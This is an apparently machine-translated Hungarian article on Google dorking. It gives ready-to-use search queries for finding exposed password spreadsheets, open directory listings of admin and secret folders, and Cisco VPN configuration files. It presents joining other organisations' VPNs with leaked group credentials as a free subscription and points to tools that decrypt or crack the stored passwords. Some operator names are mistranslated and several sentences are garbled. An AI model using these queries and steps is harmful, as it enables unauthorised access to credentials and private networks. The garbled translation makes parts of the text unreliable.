Néha véletlenül felnyitott és a látómezőben elkapott információk segítségével is el lehet jutni a minősített információkhoz Google adatok. Az ideális megoldás az, ha megtalálja a jelszavak listáját valamilyen általános formátumban. Tárolja a fiókadatokat szöveges fájl, Word dokumentum vagy elektronikus Excel táblázat Csak a kétségbeesett emberek tehetik, de belőlük mindig van elég.

Fájltípus:xls inurl:jelszó

Egyrészt rengeteg eszköz van az ilyen esetek megelőzésére. Megfelelő hozzáférési jogosultságokat kell megadni a htaccess-ben, javítani kell a CMS-t, nem szabad balkezes szkripteket használni és más lyukakat bezárni. Van egy olyan fájl is, amely a robots.txt kivételek listáját tartalmazza, amely megtiltja a keresőmotoroknak, hogy indexeljék a benne megadott fájlokat és könyvtárakat. Viszont ha valamelyik szerveren a robots.txt felépítése eltér a szabványostól, akkor azonnal kiderül, hogy mit akarnak elrejteni rajta.

A könyvtárak és fájlok listáját bármely webhelyen a szabványos index előzi meg. Mivel szolgáltatási célból meg kell jelennie a címben, célszerű a keresést az intitle operátorra korlátozni. Érdekes dolgok vannak az /admin/, /personal/, /etc/ és még a /secret/ könyvtárban is.

Maradjon velünk a frissítésekről

A relevancia itt rendkívül fontos: a régi sebezhetőségek nagyon lassan záródnak be, de a Google és keresési eredményei folyamatosan változnak. Még az „utolsó másodperc” szűrő (&tbs=qdr:s a kérés URL-címének végén) és a „valós idejű” szűrő (&tbs=qdr:1) között is van különbség.

Dátum időintervallum utolsó frissítés A Google hallgatólagosan is jelzi a fájlt. A grafikus webes felületen keresztül választhat egyet a standard időszakok közül (óra, nap, hét stb.), vagy beállíthat dátumtartományt, de ez a módszer nem alkalmas automatizálásra.

A címsor kinézete alapján csak sejtheti, hogy miként lehet korlátozni az eredmények kimenetét a &tbs=qdr: konstrukcióval. Az utána lévő y betű egy év korlátot jelöl (&tbs=qdr:y), m az utolsó hónap eredményeit mutatja, w - a hét, d - az elmúlt nap, h - az utolsó óra, n - percre, s pedig másodpercre. A Google által ismertté vált legújabb eredmények a &tbs=qdr:1 szűrő használatával érhetők el.

Ha ügyes szkriptet kell írnia, akkor hasznos tudnia, hogy a dátumtartományt a Google Julian formátumban állítja be a dátumtartomány operátor segítségével. Például így találhatja meg a bizalmas szót tartalmazó PDF dokumentumok listáját, amelyeket 2015. január 1. és július 1. között töltöttek le.

Bizalmas fájltípus: pdf dátumtartomány: 2457024-2457205

A tartomány Julian-dátumformátumban van feltüntetve, a törtrész figyelembevétele nélkül. A Gergely-naptárból manuálisan lefordítani őket kényelmetlen. Egyszerűbb a dátum konvertáló használata.

Ismét célzás és szűrés

Amellett, hogy további operátorokat ad meg a keresési lekérdezésben, ezek közvetlenül a hivatkozás törzsében is elküldhetők. Például a filetype:pdf specifikáció az as_filetype=pdf konstrukciónak felel meg. Ez kényelmessé teszi a pontosítások kérését. Tegyük fel, hogy a csak a Hondurasi Köztársaságból származó eredményeket a cr=countryHN konstrukció hozzáadásával határozzuk meg a keresési URL-hez, és csak Bobruisk városából - gcs=Bobruisk. A teljes listát a fejlesztői részben találja.

A Google automatizálási eszközeit úgy tervezték, hogy megkönnyítsék az életet, de gyakran problémákat okoznak. Például a felhasználó városát a felhasználó IP-címe határozza meg a WHOIS-on keresztül. Ezen információk alapján a Google nem csak a szerverek közötti terhelést egyensúlyozza ki, hanem a keresési eredményeket is megváltoztatja. Régiótól függően ugyanazon kérés esetén különböző eredmények jelennek meg az első oldalon, és ezek egy része teljesen rejtett lehet. A gl=country direktíva utáni kétbetűs kód segít abban, hogy kozmopolitának érezze magát, és bármely országból tájékozódjon. Például Hollandia kódja NL, de a Vatikánnak és Észak-Koreának nincs saját kódja a Google-ban.

A keresési eredmények gyakran még több speciális szűrő használata után is zsúfolttá válnak. Ebben az esetben egyszerű a kérés tisztázása több kivételszó hozzáadásával (mindegyik elé mínusz jel kerül). Például a banki, neveket és oktatóanyagokat gyakran használják a Személyes szóval. Ezért a letisztultabb keresési eredmények nem egy lekérdezés tankönyvi példáján jelennek meg, hanem egy finomított lekérdezésben:

Cím: "A /Személyes/" -nevek indexe -oktatóanyag -banki

Egy utolsó példa

Egy kifinomult hackert az a tény különböztet meg, hogy mindent egyedül lát el, amire szüksége van. Például a VPN kényelmes dolog, de vagy drága, vagy ideiglenes és korlátozásokkal. Önálló előfizetésre való feliratkozás túl drága. Még jó, hogy vannak csoportos előfizetések, és a Google segítségével könnyen bekerülhet egy csoportba. Ehhez csak keresse meg a Cisco VPN konfigurációs fájlt, amelynek meglehetősen nem szabványos PCF kiterjesztése és felismerhető elérési útja van: Program Files\Cisco Systems\VPN Client\Profiles. Egy kérés, és csatlakozol például a Bonni Egyetem barátságos csapatához.

Fájltípus: pcf vpn VAGY csoport

INFORMÁCIÓ A Google megtalálja konfigurációs fájlok jelszavakkal, de sok közülük titkosított formában van írva, vagy kivonatokkal van helyettesítve. Ha rögzített hosszúságú karakterláncokat lát, azonnal keressen egy visszafejtő szolgáltatást.

A jelszavakat titkosítva tárolják, de Maurice Massard már írt egy programot a visszafejtésre, és ingyenesen biztosítja a thecampusgeeks.com oldalon.

at Google segítség százakat végeznek ki különböző típusok támadások és penetrációs tesztek. Számos lehetőség van hatással népszerű programok, alapvető adatbázis-formátumok, PHP számos sebezhetősége, felhők és így tovább. Ha pontosan tudod, hogy mit keresel, sokkal könnyebb lesz a beszerzése szükséges információkat(főleg olyat, amit nem terveztek nyilvánosságra hozni). Nem a Shodan az egyetlen, amely érdekes ötletekkel táplálkozik, hanem minden indexelt hálózati erőforrás adatbázis!